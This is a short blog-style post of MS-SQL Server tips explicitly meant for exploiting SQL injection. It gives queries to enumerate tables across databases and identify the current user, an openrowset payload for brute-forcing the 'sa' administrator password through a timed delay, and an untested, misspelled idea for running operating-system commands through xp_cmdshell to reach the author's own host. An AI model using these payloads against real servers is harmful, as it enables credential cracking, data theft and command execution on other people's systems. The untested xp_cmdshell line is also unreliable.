Some information about MS-SQL server. You may find this info useful for exploiting SQL injection:
Finding Table Names:
Donot use:- Select name from sysobjects where xtype='U'
Use:- SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_schema = 'db_name']
[WHERE|AND table_name LIKE 'wild']
The first query will only return the table names which belong to current databases, however, the second query will return the the table names from other databases as well to which the current user has access to.
Getting Current User
Someone pointed this out that Select user will return the owner of the current database which may differ from the current user. So, system-user is alwayas correct to use.
Brute Forcing 'sa' User's Password
Use openrowset:-select null from openrowset('sqloledb','';'sa';'[password]','select 1;waitfor delay ''0:0:10'' ')
When the password supplied is correct the query 'select 1;waitfor delay ''0:0:10'' ' will get executed. As i write this blog, i am just wondering if we can execute something like this:
select null from openrowset('sqloledb','';'sa';'[password]','exec master..xp_cmshell ''ping my_host'''). I will confirm this sometime later.